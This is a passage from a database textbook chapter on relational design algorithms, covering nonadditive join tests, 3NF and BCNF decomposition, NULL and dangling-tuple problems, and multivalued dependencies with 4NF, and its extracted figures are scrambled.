Figure 1(a) shows how we apply Algorithm 3 to the decomposition of the
EMP_PROJ relation schema from Figure 3(b) from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases” into the two relation
schemas EMP_PROJ1 and EMP_LOCS in Figure 5(a) of the same chapter. The loop
in step 4 of the algorithm cannot change any b symbols to a symbols; hence, the
resulting matrix S does not have a row with all a symbols, and so the decomposition
does not have the non-additive join property.

Figure 1(b) shows another decomposition of EMP_PROJ (into EMP, PROJECT, and
WORKS_ON) that does have the nonadditive join property, and Figure 1(c) shows
how we apply the algorithm to that decomposition. Once a row consists only of a
symbols, we conclude that the decomposition has the nonadditive join property,
and we can stop applying the functional dependencies (step 4 in the algorithm) to
the matrix S.

562

Relational Database Design Algorithms and Further Dependencies

Pnumber

PROJECT(b)
Pname Plocation

Ssn
R1 b11

a1

a2
b22

b13
a3

b14
a4

a5
a5

b16
a6

a1
b21

a2
b22

b13
a3

b14
a4

b15
a5

b16
b26

R2

R1
R2
R3

D = {R1, R2 }

(No changes to matrix after applying functional dependencies)

Ename Pnumber Pname HoursPlocation

Ssn

EMP

(a) R = {Ssn, Ename, Pnumber, Pname, Plocation, Hours}
R1 = EMP_LOCS = {Ename, Plocation}
R2 = EMP_PROJ1 = {Ssn, Pnumber, Hours, Pname, Plocation}

(c)

Ename Ssn

WORKS_ON
Pnumber Hours

Ssn

a1 b32 a3 b34 b35 a6

a1
b21

a2
b22

b13
a3

b14
a4

b15
a5

b16
b26

R1
R2
R3 a1 a2b32 b34a3 a4 a5 a6

(Original matrix S at start of algorithm)

Ename Pnumber Pname HoursPlocation

Ssn

(Matrix S after applying the first two functional dependencies;
last row is all “a” symbols so we stop)

Ename Pnumber Pname HoursPlocation

F = {Ssn Ename; Pnumber {Pname, Plocation}; {Ssn, Pnumber} Hours}

D = {R1, R2, R3}R = {Ssn, Ename, Pnumber, Pname, Plocation, Hours}
R1 = EMP = {Ssn, Ename}
R2 = PROJ = {Pnumber, Pname, Plocation}
R3 = WORKS_ON = {Ssn, Pnumber, Hours}

F = {Ssn Ename; Pnumber {Pname, Plocation}; {Ssn, Pnumber} Hours}

b35

Figure 1
Nonadditive join test for n-ary decompositions. (a) Case 1: Decomposition of EMP_PROJ
into EMP_PROJ1 and EMP_LOCS fails test. (b) A decomposition of EMP_PROJ that has
the lossless join property. (c) Case 2: Decomposition of EMP_PROJ into EMP, PROJECT,
and WORKS_ON satisfies test.

563

Relational Database Design Algorithms and Further Dependencies

2.4 Testing Binary Decompositions for the Nonadditive
Join Property

Algorithm 3 allows us to test whether a particular decomposition D into n relations
obeys the nonadditive join property with respect to a set of functional dependencies
F. There is a special case of a decomposition called a binary decomposition—
decomposition of a relation R into two relations. We give an easier test to apply than
Algorithm 3, but while it is very handy to use, it is limited to binary decompositions
only.

Property NJB (Nonadditive Join Test for Binary Decompositions). A
decomposition D = {R1, R2} of R has the lossless (nonadditive) join property
with respect to a set of functional dependencies F on R if and only if either

■ The FD ((R1 ∩ R2) → (R1 – R2)) is in F
+, or

■ The FD ((R1 ∩ R2) → (R2 – R1)) is in F
+

You should verify that this property holds with respect to our informal successive
normalization examples in Sections 3 and 4 from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases.” In Section 5 of the
same chapter we decomposed LOTS1A into two BCNF relations LOTS1AX and
LOTS1AY, and decomposed the TEACH relation in Figure 14 of that chapter into the
two relations {Instructor, Course} and {Instructor, Student}. These are valid decompo-
sitions because they are nonadditive per the above test.

2.5 Successive Nonadditive Join Decompositions
We saw the successive decomposition of relations during the process of second and
third normalization in Sections 3 and 4 from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases.” To verify that these
decompositions are nonadditive, we need to ensure another property, as set forth in
Claim 2.

Claim 2 (Preservation of Nonadditivity in Successive Decompositions). If a
decomposition D = {R1, R2, …, Rm} of R has the nonadditive (lossless) join
property with respect to a set of functional dependencies F on R, and if a
decomposition Di = {Q1, Q2, …, Qk} of Ri has the nonadditive join property
with respect to the projection of F on Ri, then the decomposition D2 = {R1, R2,
…, Ri−1, Q1, Q2, …, Qk, Ri+1, …, Rm} of R has the nonadditive join property with
respect to F.

3 Algorithms for Relational Database Schema
Design

We now give three algorithms for creating a relational decomposition from a uni-
versal relation. Each algorithm has specific properties, as we discuss next.

564

Relational Database Design Algorithms and Further Dependencies

3.1 Dependency-Preserving Decomposition
into 3NF Schemas

Algorithm 4 creates a dependency-preserving decomposition D = {R1, R2, …, Rm} of
a universal relation R based on a set of functional dependencies F, such that each Ri
in D is in 3NF. It guarantees only the dependency-preserving property; it does not
guarantee the nonadditive join property. The first step of Algorithm 4 is to find a
minimal cover G for F; Algorithm 2 can be used for this step. Note that multiple
minimal covers may exist for a given set F (as we illustrate later in the example after
Algorithm 4). In such cases the algorithms can potentially yield multiple alternative
designs.

Algorithm 4. Relational Synthesis into 3NF with Dependency Preservation
Input: A universal relation R and a set of functional dependencies F on the
attributes of R.

1. Find a minimal cover G for F (use Algorithm 2);

2. For each left-hand-side X of a functional dependency that appears in G, cre-
ate a relation schema in D with attributes {X ∪ {A1} ∪ {A2} … ∪ {Ak} },
where X → A1, X → A2, …, X → Ak are the only dependencies in G with X as
the left-hand-side (X is the key of this relation);

3. Place any remaining attributes (that have not been placed in any relation) in
a single relation schema to ensure the attribute preservation property.

Example of Algorithm 4. Consider the following universal relation:

U(Emp_ssn, Pno, Esal, Ephone, Dno, Pname, Plocation)

Emp_ssn, Esal, Ephone refer to the Social Security number, salary, and phone number
of the employee. Pno, Pname, and Plocation refer to the number, name, and location
of the project. Dno is department number.

The following dependencies are present:

FD1: Emp_ssn → {Esal, Ephone, Dno}
FD2: Pno → { Pname, Plocation}
FD3: Emp_ssn, Pno → {Esal, Ephone, Dno, Pname, Plocation}

By virtue of FD3, the attribute set {Emp_ssn, Pno} represents a key of the universal
relation. Hence F, the set of given FDs includes {Emp_ssn → Esal, Ephone, Dno;
Pno → Pname, Plocation; Emp_ssn, Pno → Esal, Ephone, Dno, Pname, Plocation}.

By applying the minimal cover Algorithm 2, in step 3 we see that Pno is a redundant
attribute in Emp_ssn, Pno → Esal, Ephone, Dno. Moreover, Emp_ssn is redundant in
Emp_ssn, Pno → Pname, Plocation. Hence the minimal cover consists of FD1 and FD2
only (FD3 being completely redundant) as follows (if we group attributes with the
same left-hand side into one FD):

Minimal cover G: {Emp_ssn → Esal, Ephone, Dno; Pno → Pname, Plocation}

565

Relational Database Design Algorithms and Further Dependencies

6See Maier (1983) or Ullman (1982) for a proof.

By applying Algorithm 4 to the above Minimal cover G, we get a 3NF design consist-
ing of two relations with keys Emp_ssn and Pno as follows:

R1 (Emp_ssn, Esal, Ephone, Dno)
R2 (Pno, Pname, Plocation)

An observant reader would notice easily that these two relations have lost the original
information contained in the key of the universal relation U (namely, that there are
certain employees working on certain projects in a many-to-many relationship).
Thus, while the algorithm does preserve the original dependencies, it makes no guar-
antee of preserving all of the information. Hence, the resulting design is a lossy design.

Claim 3. Every relation schema created by Algorithm 4 is in 3NF. (We will not
provide a formal proof here;6 the proof depends on G being a minimal set of
dependencies.)

It is obvious that all the dependencies in G are preserved by the algorithm because
each dependency appears in one of the relations Ri in the decomposition D. Since G
is equivalent to F, all the dependencies in F are either preserved directly in the
decomposition or are derivable using the inference rules from Section 1.1 from
those in the resulting relations, thus ensuring the dependency preservation prop-
erty. Algorithm 4 is called a relational synthesis algorithm, because each relation
schema Ri in the decomposition is synthesized (constructed) from the set of func-
tional dependencies in G with the same left-hand-side X.

3.2 Nonadditive Join Decomposition into BCNF Schemas
The next algorithm decomposes a universal relation schema R = {A1, A2, …, An} into
a decomposition D = {R1, R2, …, Rm} such that each Ri is in BCNF and the decom-
position D has the lossless join property with respect to F. Algorithm 5 utilizes
Property NJB and Claim 2 (preservation of nonadditivity in successive decomposi-
tions) to create a nonadditive join decomposition D = {R1, R2, …, Rm} of a universal
relation R based on a set of functional dependencies F, such that each Ri in D is in
BCNF.

Algorithm 5. Relational Decomposition into BCNF with Nonadditive
Join Property

Input: A universal relation R and a set of functional dependencies F on the
attributes of R.

1. Set D := {R} ;

2. While there is a relation schema Q in D that is not in BCNF do
{

choose a relation schema Q in D that is not in BCNF;
find a functional dependency X → Y in Q that violates BCNF;
replace Q in D by two relation schemas (Q – Y) and (X ∪ Y);

} ;

566

Relational Database Design Algorithms and Further Dependencies

Each time through the loop in Algorithm 5, we decompose one relation schema Q
that is not in BCNF into two relation schemas. According to Property NJB for
binary decompositions and Claim 2, the decomposition D has the nonadditive join
property. At the end of the algorithm, all relation schemas in D will be in BCNF. The
reader can check that the normalization example in Figures 12 and 13 from the
chapter “Basics of Functional Dependencies and Normalization for Relational
Databases” basically follows this algorithm. The functional dependencies FD3, FD4,
and later FD5 violate BCNF, so the LOTS relation is decomposed appropriately into
BCNF relations, and the decomposition then satisfies the nonadditive join property.
Similarly, if we apply the algorithm to the TEACH relation schema from Figure 14
that same chapter, it is decomposed into TEACH1(Instructor, Student) and
TEACH2(Instructor, Course) because the dependency FD2 Instructor → Course vio-
lates BCNF.

In step 2 of Algorithm 5, it is necessary to determine whether a relation schema Q is
in BCNF or not. One method for doing this is to test, for each functional depend-
ency X → Y in Q, whether X+ fails to include all the attributes in Q, thereby deter-
mining whether or not X is a (super)key in Q. Another technique is based on an
observation that whenever a relation schema Q has a BCNF violation, there exists a
pair of attributes A and B in Q such that {Q – {A, B} } → A; by computing the clo-
sure {Q – {A, B} }+ for each pair of attributes {A, B} of Q, and checking whether the
closure includes A (or B), we can determine whether Q is in BCNF.

3.3 Dependency-Preserving and Nonadditive (Lossless)
Join Decomposition into 3NF Schemas

So far, in Algorithm 4 we showed how to achieve a 3NF design with the potential for
loss of information and in Algorithm 5 we showed how to achieve BCNF design
with the potential loss of certain functional dependencies. By now we know that it is
not possible to have all three of the following: (1) guaranteed nonlossy design, (2)
guaranteed dependency preservation, and (3) all relations in BCNF. As we have said
before, the first condition is a must and cannot be compromised. The second condi-
tion is desirable, but not a must, and may have to be relaxed if we insist on achiev-
ing BCNF. Now we give an alternative algorithm where we achieve conditions 1 and
2 and only guarantee 3NF. A simple modification to Algorithm 4, shown as
Algorithm 6, yields a decomposition D of R that does the following:

■ Preserves dependencies

■ Has the nonadditive join property

■ Is such that each resulting relation schema in the decomposition is in 3NF

Because the Algorithm 6 achieves both the desirable properties, rather than only
functional dependency preservation as guaranteed by Algorithm 4, it is preferred
over Algorithm 4.

Algorithm 6. Relational Synthesis into 3NF with Dependency Preservation
and Nonadditive Join Property

Input: A universal relation R and a set of functional dependencies F on the
attributes of R.

567

Relational Database Design Algorithms and Further Dependencies

7Step 3 of Algorithm 4 is not needed in Algorithm 6 to preserve attributes because the key will include
any unplaced attributes; these are the attributes that do not participate in any functional depen-dency.
8Note that there is an additional type of dependency: R is a projection of the join of two or more relations
in the schema. This type of redundancy is considered join dependency. Hence, technically, it may con-
tinue to exist without disturbing the 3NF status for the schema.

1. Find a minimal cover G for F (use Algorithm 2).

2. For each left-hand-side X of a functional dependency that appears in G, cre-
ate a relation schema in D with attributes {X ∪ {A1} ∪ {A2} … ∪ {Ak} },
where X → A1, X → A2, …, X → Ak are the only dependencies in G with X as
left-hand-side (X is the key of this relation).

3. If none of the relation schemas in D contains a key of R, then create one
more relation schema in D that contains attributes that form a key of R.7

(Algorithm 2(a) may be used to find a key.)

4. Eliminate redundant relations from the resulting set of relations in the rela-
tional database schema. A relation R is considered redundant if R is a projec-
tion of another relation S in the schema; alternately, R is subsumed by S.8

Step 3 of Algorithm 6 involves identifying a key K of R. Algorithm 2(a) can be used
to identify a key K of R based on the set of given functional dependencies F. Notice
that the set of functional dependencies used to determine a key in Algorithm 2(a)
could be either F or G, since they are equivalent.

Example 1 of Algorithm 6. Let us revisit the example given earlier at the end of
Algorithm 4. The minimal cover G holds as before. The second step produces rela-
tions R1 and R2 as before. However, now in step 3, we will generate a relation corre-
sponding to the key {Emp_ssn, Pno}. Hence, the resulting design contains:

R1 (Emp_ssn , Esal, Ephone, Dno)
R2 (Pno, Pname, Plocation)
R3 (Emp_ssn, Pno)

This design achieves both the desirable properties of dependency preservation and
nonadditive join.

Example 2 of Algorithm 6 (Case X ). Consider the relation schema LOTS1A
shown in Figure 13(a) from the chapter “Basics of Functional Dependencies and
Normalization for Relational Databases.” Assume that this relation is given as a uni-
versal relation with the following functional dependencies:

FD1: Property_id → Lot#, County, Area
FD2: Lot#, County → Area, Property_id
FD3: Area → County

These were called FD1, FD2, and FD5 in Figure 13(a) of that chapter. For ease of ref-

568

Relational Database Design Algorithms and Further Dependencies

erence, let us abbreviate the above attributes with the first letter for each and repre-
sent the functional dependencies as the set

F : { P → LCA, LC → AP, A → C }.

If we apply the minimal cover Algorithm 2 to F, (in step 2) we first represent the set
F as

F : {P → L, P → C, P → A, LC → A, LC → P, A → C}.

In the set F, P → A can be inferred from P → LC and LC → A; hence P → A by tran-
sitivity and is therefore redundant. Thus, one possible minimal cover is

Minimal cover GX: {P → LC, LC → AP, A → C }.

In step 2 of Algorithm 6 we produce design X (before removing redundant rela-
tions) using the above minimal cover as

Design X: R1 (P, L, C), R2 (L, C, A, P), and R3 (A, C).

In step 4 of the algorithm, we find that R3 is subsumed by R2 (that is, R3 is always a
projection of R2 and R1 is a projection of R2 as well. Hence both of those relations
are redundant. Thus the 3NF schema that achieves both of the desirable properties
is (after removing redundant relations)

Design X: R2 (L, C, A, P).

or, in other words it is identical to the relation LOTS1A (Lot#, County, Area,
Property_id) that were determined to be in 3NF.

Example 2 of Algorithm 6 (Case Y ). Starting with LOTS1A as the universal rela-
tion and with the same given set of functional dependencies, the second step of the
minimal cover Algorithm 2 produces, as before

F: {P → C, P → A, P → L, LC → A, LC → P, A → C}.

The FD LC → A may be considered redundant because LC → P and P → A implies
LC → A by transitivity. Also, P → C may be considered to be redundant because P →
A and A → C implies P → C by transitivity. This gives a different minimal cover as

Minimal cover GY: { P → LA, LC → P, A → C }.

The alternative design Y produced by the algorithm now is

Design Y: S1 (P, A, L), S2 (L, C, P), and S3 (A, C).

Note that this design has three 3NF relations, none of which can be considered as
redundant by the condition in step 4. All FDs in the original set F are preserved. The
reader will notice that out of the above three relations, relations S1 and S3 were pro-
duced as the BCNF design (implying that S2 is redundant in the presence of S1 and
S3). However, we cannot eliminate relation S2 from the set of three 3NF relations
above since it is not a projection of either S1 or S3. Design Y therefore remains as one
possible final result of applying Algorithm 6 to the given universal relation that pro-
vides relations in 3NF.

It is important to note that the theory of nonadditive join decompositions is based
on the assumption that no NULL values are allowed for the join attributes. The next

569

Relational Database Design Algorithms and Further Dependencies

section discusses some of the problems that NULLs may cause in relational decom-
positions and provides a general discussion of the algorithms for relational design
by synthesis presented in this section.

4 About Nulls, Dangling Tuples,
and Alternative Relational Designs

In this section we will discuss a few general issues related to problems that arise
when relational design is not approached properly.

4.1 Problems with NULL Values and Dangling Tuples
We must carefully consider the problems associated with NULLs when designing a
relational database schema. There is no fully satisfactory relational design theory as
yet that includes NULL values. One problem occurs when some tuples have NULL
values for attributes that will be used to join individual relations in the decomposi-
tion. To illustrate this, consider the database shown in Figure 2(a), where two rela-
tions EMPLOYEE and DEPARTMENT are shown. The last two employee
tuples—‘Berger’ and ‘Benitez’—represent newly hired employees who have not yet
been assigned to a department (assume that this does not violate any integrity con-
straints). Now suppose that we want to retrieve a list of (Ename, Dname) values for
all the employees. If we apply the NATURAL JOIN operation on EMPLOYEE and
DEPARTMENT (Figure 2(b)), the two aforementioned tuples will not appear in the
result. The OUTER JOIN operation can deal with this problem. Recall that if we take
the LEFT OUTER JOIN of EMPLOYEE with DEPARTMENT, tuples in EMPLOYEE that
have NULL for the join attribute will still appear in the result, joined with an
imaginary tuple in DEPARTMENT that has NULLs for all its attribute values. Figure
2(c) shows the result.

In general, whenever a relational database schema is designed in which two or more
relations are interrelated via foreign keys, particular care must be devoted to watch-
ing for potential NULL values in foreign keys. This can cause unexpected loss of
information in queries that involve joins on that foreign key. Moreover, if NULLs
occur in other attributes, such as Salary, their effect on built-in functions such as
SUM and AVERAGE must be carefully evaluated.

A related problem is that of dangling tuples, which may occur if we carry a decom-
position too far. Suppose that we decompose the EMPLOYEE relation in Figure 2(a)
further into EMPLOYEE_1 and EMPLOYEE_2, shown in Figure 3(a) and 3(b).9 If we
apply the NATURAL JOIN operation to EMPLOYEE_1 and EMPLOYEE_2, we get the
original EMPLOYEE relation. However, we may use the alternative representation,
shown in Figure 3(c), where we do not include a tuple in EMPLOYEE_3 if the

9This sometimes happens when we apply vertical fragmentation to a relation in the context of a distrib-
uted database.

570

Relational Database Design Algorithms and Further Dependencies

(b)

Ename

EMPLOYEE
(a)

Ssn Bdate Address Dnum

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.

Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

987987987

888665555

1969-03-29

1937-11-10

980 Dallas, Houston, TX

450 Stone, Houston, TX

123456789

333445555

999887777

987654321

666884444

453453453

1965-01-09

1955-12-08

1968-07-19

1941-06-20

1962-09-15

1972-07-31

731 Fondren, Houston, TX

638 Voss, Houston, TX

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

5

5

4

4

5

4

1

Berger, Anders C. 999775555 1965-04-26 6530 Braes, Bellaire, TX NULL

Benitez, Carlos M. 888664444 1963-01-09 7654 Beech, Houston, TX NULL

5

Dname

DEPARTMENT

Dnum Dmgr_ssn

Research

Administration
Headquarters

5

4
1

333445555

987654321
888665555

Ename

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.

Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

999887777

123456789

333445555

453453453

987654321

666884444

987987987

888665555 1937-11-10

Ssn

1968-07-19

1965-01-09

1955-12-08

1972-07-31

1969-03-29

1941-06-20

1962-09-15

Bdate

3321 Castle, Spring, TX

731 Fondren, Houston, TX 5

638 Voss, Houston, TX

5631 Rice, Houston, TX

980 Dallas, Houston, TX

450 Stone, Houston, TX

291 Berry, Bellaire, TX

975 Fire Oak, Humble, TX

Address

4

5

5

4

1

4

5

Administration

Research

Research

Research

Administration

Headquarters

Administration

Research

987654321

333445555

333445555

333445555

987654321

888665555

987654321

333445555

Dnum Dname Dmgr_ssn

(c)

Ename

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.

Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

999887777

123456789

333445555

453453453

987654321

666884444

987987987

888665555 1937-11-10

1968-07-19

1965-01-09

1955-12-08

1972-07-31

1969-03-29

1941-06-20

1962-09-15

Bdate

3321 Castle, Spring, TX

731 Fondren, Houston, TX 5

638 Voss, Houston, TX

5631 Rice, Houston, TX

980 Dallas, Houston, TX

450 Stone, Houston, TX

291 Berry, Bellaire, TX

975 Fire Oak, Humble, TX

Address

4

5

5

4

1

4

5

Administration

Research

Research

Research

Administration

Headquarters

Administration

Research

987654321

333445555

333445555

333445555

987654321

888665555

Berger, Anders C.

Benitez, Carlos M.

999775555

888665555 1963-01-09

1965-04-26 6530 Braes, Bellaire, TX

7654 Beech, Houston, TX

NULL

NULL

NULL

NULL

NULL

NULL

987654321

333445555

Dnum Dname Dmgr_ssnSsn

Figure 2
Issues with NULL-value
joins. (a) Some
EMPLOYEE tuples have
NULL for the join attrib-
ute Dnum. (b) Result of
applying NATURAL JOIN
to the EMPLOYEE and
DEPARTMENT relations.
(c) Result of applying
LEFT OUTER JOIN to
EMPLOYEE and
DEPARTMENT.

571

Ename

EMPLOYEE_1(a)

(b)

Ssn Bdate Address

Smith, John B.

Wong, Franklin T.

Zelaya, Alicia J.

Wallace, Jennifer S.

Narayan, Ramesh K.

English, Joyce A.

Jabbar, Ahmad V.

Borg, James E.

987987987

888665555

1969-03-29

1937-11-10

980 Dallas, Houston, TX

450 Stone, Houston, TX

123456789

333445555

999887777

987654321

666884444

453453453

1965-01-09

1955-12-08

1968-07-19

1941-06-20

1962-09-15

1972-07-31

731 Fondren, Houston, TX

638 Voss, Houston, TX

3321 Castle, Spring, TX

291 Berry, Bellaire, TX

975 Fire Oak, Humble, TX

5631 Rice, Houston, TX

Berger, Anders C.

Benitez, Carlos M.

999775555

888665555

1965-04-26

1963-01-09

6530 Braes, Bellaire, TX

7654 Beech, Houston, TX

EMPLOYEE_2

Ssn

123456789

333445555

999887777

987654321

666884444

453453453

987987987

888665555

999775555

888664444

4

5

5

5

4

5

NULL

4

1

NULL

Dnum

(c) EMPLOYEE_3

Ssn

123456789

333445555

999887777

987654321

666884444

453453453

987987987

888665555

4

5

5

5

4

5

4

1

Dnum

Relational Database Design Algorithms and Further Dependencies

Figure 3
The dangling tuple problem.
(a) The relation EMPLOYEE_1 (includes

all attributes of EMPLOYEE from
Figure 2(a) except Dnum).

(b) The relation EMPLOYEE_2 (includes
Dnum attribute with NULL values).

(c) The relation EMPLOYEE_3 (includes
Dnum attribute but does not include
tuples for which Dnum has NULL val-
ues).

employee has not been assigned a department (instead of including a tuple with
NULL for Dnum as in EMPLOYEE_2). If we use EMPLOYEE_3 instead of EMPLOYEE_2
and apply a NATURAL JOIN on EMPLOYEE_1 and EMPLOYEE_3, the tuples for
Berger and Benitez will not appear in the result; these are called dangling tuples in
EMPLOYEE_1 because they are represented in only one of the two relations that rep-
resent employees, and hence are lost if we apply an (INNER) JOIN operation.

4.2 Discussion of Normalization Algorithms
and Alternative Relational Designs

One of the problems with the normalization algorithms we described is that the
database designer must first specify all the relevant functional dependencies among
the database attributes. This is not a simple task for a large database with hundreds

572

Relational Database Design Algorithms and Further Dependencies

of attributes. Failure to specify one or two important dependencies may result in an
undesirable design. Another problem is that these algorithms are not deterministic
in general. For example, the synthesis algorithms (Algorithms 4 and 6) require the
specification of a minimal cover G for the set of functional dependencies F. Because
there may be in general many minimal covers corresponding to F, as we illustrated
in Example 2 of Algorithm 6 above, the algorithm can give different designs
depending on the particular minimal cover used. Some of these designs may not be
desirable. The decomposition algorithm to achieve BCNF (Algorithm 5) depends
on the order in which the functional dependencies are supplied to the algorithm to
check for BCNF violation. Again, it is possible that many different designs may arise
corresponding to the same set of functional dependencies, depending on the order
in which such dependencies are considered for violation of BCNF. Some of the
designs may be preferred, whereas others may be undesirable.

It is not always possible to find a decomposition into relation schemas that pre-
serves dependencies and allows each relation schema in the decomposition to be in
BCNF (instead of 3NF as in Algorithm 6). We can check the 3NF relation schemas
in the decomposition individually to see whether each satisfies BCNF. If some rela-
tion schema Ri is not in BCNF, we can choose to decompose it further or to leave it
as it is in 3NF (with some possible update anomalies).

To illustrate the above points, let us revisit the LOTS1A relation in Figure 13(a) from
the chapter “Basics of Functional Dependencies and Normalization for Relational
Databases.” It is a relation in 3NF, which is not in BCNF as was shown in Section 5
of that chapter. We also showed that starting with the functional dependencies
(FD1, FD2, and FD5 in Figure 13(a) same chapter), using the bottom-up approach
to design and applying Algorithm 6, it is possible to either come up with the LOTS1A
relation as the 3NF design (which was called design X previously), or an alternate
design Y which consists of three relations S1, S2, S3 (design Y), each of which is a
3NF relation. Note that if we test design Y further for BCNF, each of S1, S2, and S3
turn out to be individually in BCNF. The design X, however, when tested for BCNF,
fails the test. It yields the two relations S1 and S3 by applying Algorithm 5 (because
of the violating functional dependency A → C). Thus, the bottom-up design proce-
dure of applying Algorithm 6 to design 3NF relations to achieve both properties and
then applying Algorithm 5 to achieve BCNF with the nonadditive join property
(and sacrificing functional dependency preservation) yields S1, S2, S3 as the final
BCNF design by one route (Y design route) and S1, S3 by the other route (X design
route). This happens due to the multiple minimal covers for the original set of func-
tional dependencies. Note that S2 is a redundant relation in the Y design; however, it
does not violate the nonadditive join constraint. It is easy to see that S2 is a valid and
meaningful relation that has the two candidate keys (L, C), and P placed side-by-
side.

Table 1 summarizes the properties of the algorithms discussed in this chapter so far.

573

Relational Database Design Algorithms and Further Dependencies

Table 1 Summary of the Algorithms Discussed in This Chapter

Algorithm Input Output Properties/Purpose Remarks

1 An attribute or a set
of attributes X, and a
set of FDs F

A set of attrbutes in
the closure of X with
respect to F

Determine all the
attributes that can be
functionally deter-
mined from X

The closure of a key
is the entire relation

2 A set of functional
dependencies F

The minimal cover
of functional
dependencies

To determine the
minimal cover of a
set of dependencies F

Multiple minimal
covers may exist—
depends on the order
of selecting function-
al dependencies

2a Relation schema R
with a set of func-
tional dependencies
F

Key K of R To find a key K
(that is a subset of R)

The entire relation R
is always a default
superkey

3 A decomposition D
of R and a set F of
functional depen-
dencies

Boolean result: yes or
no for nonadditive
join property

Testing for nonaddi-
tive join decomposi-
tion

See a simpler test
NJB in Section 2.4
for binary decompo-
sitions

4 A relation R and a
set of functional
dependencies F

A set of relations in
3NF

Dependency preser-
vation

No guarantee of sat-
isfying lossless join
property

5 A relation R and a
set of functional
dependencies F

A set of relations in
BCNF

Nonadditive join
decomposition

No guarantee of
dependency preser-
vation

6 A relation R and a
set of functional
dependencies F

A set of relations in
3NF

Nonadditive join
and dependency-
preserving decompo-
sition

May not achieve
BCNF, but achieves
all desirable proper-
ties and 3NF

7 A relation R and a
set of functional and
multivalued depen-
dencies

A set of relations in
4NF

Nonadditive join
decomposition

No guarantee of
dependency preser-
vation

5 Discussion of Multivalued Dependencies and
4NF

Now we visit MVDs (Multivalued Dependencies) to state the rules of inference on
MVDs.

574

5.1 Inference Rules for Functional
and Multivalued Dependencies

As with functional dependencies (FDs), inference rules for multivalued dependen-
cies (MVDs) have been developed. It is better, though, to develop a unified frame-
work that includes both FDs and MVDs so that both types of constraints can be
considered together. The following inference rules IR1 through IR8 form a sound
and complete set for inferring functional and multivalued dependencies from a
given set of dependencies. Assume that all attributes are included in a universal rela-
tion schema R = {A1, A2, …, An} and that X, Y, Z, and W are subsets of R.

IR1 (reflexive rule for FDs): If X ⊇ Y, then X → Y.
IR2 (augmentation rule for FDs): {X → Y} |= XZ → YZ.
IR3 (transitive rule for FDs): {X → Y, Y → Z} |= X → Z.
IR4 (complementation rule for MVDs): {X →→ Y} |= {X →→ (R – (X ∪ Y))}.
IR5 (augmentation rule for MVDs): If X →→ Y and W ⊇ Z, then WX →→ YZ.
IR6 (transitive rule for MVDs): {X →→ Y, Y →→ Z} |= X →→ (Z – Y).
IR7 (replication rule for FD to MVD): {X → Y} |= X →→ Y.
IR8 (coalescence rule for FDs and MVDs): If X →→ Y and there exists W with the
properties that (a) W ∩ Y is empty, (b) W → Z, and (c) Y ⊇ Z, then X → Z.

IR1 through IR3 are Armstrong’s inference rules for FDs alone. IR4 through IR6 are
inference rules pertaining to MVDs only. IR7 and IR8 relate FDs and MVDs. In par-
ticular, IR7 says that a functional dependency is a special case of a multivalued
dependency; that is, every FD is also an MVD because it satisfies the formal defini-
tion of an MVD. However, this equivalence has a catch: An FD X → Y is an MVD
X →→ Y with the additional implicit restriction that at most one value of Y is associ-
ated with each value of X.10 Given a set F of functional and multivalued dependen-
cies specified on R = {A1, A2, …, An}, we can use IR1 through IR8 to infer the
(complete) set of all dependencies (functional or multivalued) F+ that will hold in
every relation state r of R that satisfies F. We again call F+ the closure of F.

5.2 Fourth Normal Form Revisited
The definition of fourth normal form (4NF) is:

Definition. A relation schema R is in 4NF with respect to a set of dependen-
cies F (that includes functional dependencies and multivalued dependencies)
if, for every nontrivial multivalued dependency X →→ Y in F+, X is a superkey
for R.

Relational Database Design Algorithms and Further Dependencies

10That is, the set of values of Y determined by a value of X is restricted to being a singleton set with only
one value. Hence, in practice, we never view an FD as an MVD.

575

(a) EMP

Ename

Smith

Smith

Smith

Smith

Brown

Brown

Brown

Brown

Brown

Brown

Brown

Brown

Brown

Brown

Brown

Brown

John

Anna

Anna

John

Jim

Jim

Jim

Jim

Joan

Joan

Joan

Joan

Bob

Bob

Bob

Bob

X

Y

X

Y

Y

Z

W

X

Y

Z

W

X

Y

Z

W

X

Pname Dname

(b) EMP_PROJECTS

Ename

Smith

Smith

Brown

Brown

Brown

Brown

W

X

Y

Z

X

Y

Pname

EMP_DEPENDENTS

Ename

Smith
Smith

Brown
Brown

Brown

Jim
Joan

Bob

Anna
John

Dname

Figure 4
Decomposing a relation state of EMP that is not in 4NF. (a) EMP relation with
additional tuples. (b) Two corresponding 4NF relations EMP_PROJECTS and
EMP_DEPENDENTS.

Relational Database Design Algorithms and Further Dependencies

To illustrate the importance of 4NF, Figure 4(a) shows the EMP relation with an
additional employee, ‘Brown’, who has three dependents (‘Jim’, ‘Joan’, and ‘Bob’) and
works on four different projects (‘W’, ‘X’, ‘Y’, and ‘Z’). There are 16 tuples in EMP in
Figure 4(a). If we decompose EMP into EMP_PROJECTS and EMP_DEPENDENTS,
as shown in Figure 4(b), we need to store a total of only 11 tuples in both relations.
Not only would the decomposition save on storage, but the update anomalies asso-
ciated with multivalued dependencies would also be avoided. For example, if
‘Brown’ starts working on a new additional project ‘P,’ we must insert three tuples in
EMP—one for each dependent. If we forget to insert any one of those, the relation
violates the MVD and becomes inconsistent in that it incorrectly implies a relation-
ship between project and dependent.

If the relation has nontrivial MVDs, then insert, delete, and update operations on
single tuples may cause additional tuples to be modified besides the one in question.
If the update is handled incorrectly, the meaning of the relation may change.
However, after normalization into 4NF, these update anomalies disappear. For

576

example, to add the information that ‘Brown’ will be assigned to project ‘P’, only a
single tuple need be inserted in the 4NF relation EMP_PROJECTS.

The EMP relation in Figure 15(a) from the chapter “Basics of Functional
Dependencies and Normalization for Relational Databases” is not in 4NF because it
represents two independent 1:N relationships—one between employees and the
projects they work on and the other between employees and their dependents. We
sometimes have a relationship among three entities that depends on all three partic-
ipating entities, such as the SUPPLY relation shown in Figure 15(c) from the same
